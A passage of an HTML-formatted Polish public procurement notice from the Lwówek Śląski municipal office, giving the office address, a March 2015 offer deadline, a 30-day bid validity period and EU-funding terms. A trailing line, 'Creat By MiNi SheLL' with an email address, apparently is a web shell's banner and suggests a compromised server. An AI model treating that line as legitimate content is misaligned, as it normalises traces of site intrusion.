Al. Wojska Polskiego 25A
59-600 Lwówek Śląski
pok. nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2015 godzina 14:00, miejsce: Urząd Gminy i Miasta Lwówek Śląski
Al. Wojska Polskiego 25A
59-600 Lwówek Śląski
Sekretariat pok. nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com